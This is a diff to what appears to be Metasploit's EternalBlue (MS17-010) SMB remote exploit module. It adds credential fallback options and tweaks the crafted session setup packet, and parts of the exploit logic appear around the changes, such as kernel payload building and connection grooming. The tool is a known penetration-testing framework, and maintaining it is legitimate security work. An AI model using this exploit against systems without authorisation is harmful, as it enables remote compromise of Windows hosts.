@@ -161,8 +161,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         Opt::RHOSTS,
         Opt::RPORT(445),
-        OptString.new('SMBUser', [false, '(Optional) The username to authenticate as', '']),
-        OptString.new('SMBPass', [false, '(Optional) The password for the specified username', '']),
+        OptString.new('SMBUser', [false, '(Optional) The username to authenticate as', ''], fallbacks: ['USERNAME']),
+        OptString.new('SMBPass', [false, '(Optional) The password for the specified username', ''], fallbacks: ['PASSWORD']),
         OptString.new('SMBDomain', [
           false,
           '(Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7,' \
@@ -717,8 +717,8 @@ module EternalBlueWin8
 
   def exploit_eb
     num_groom_conn = datastore['GroomAllocations'].to_i
-    smbuser = datastore.keys.include?('SMBUser') ? datastore['SMBUser'] : ''
-    smbpass = datastore.keys.include?('SMBPass') ? datastore['SMBPass'] : ''
+    smbuser = datastore['SMBUser'].present? ? datastore['SMBUser'] : ''
+    smbpass = datastore['SMBPass'].present? ? datastore['SMBPass'] : ''
 
     sc = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])
 
@@ -1571,8 +1571,10 @@ module EternalBlueWin7
     packet.parameter_block.max_mpx_count = 10
     packet.parameter_block.security_blob_length = 0
 
-    packet.data_block.native_os = native_os
-    packet.data_block.native_lan_man = "\x00" * 17
+    packet.smb_header.flags2.unicode = 0
+    packet.data_block.security_blob = native_os + "\x00" * 15
+    packet.data_block.native_os = ''
+    packet.data_block.native_lan_man = ''
     packet
   end
 
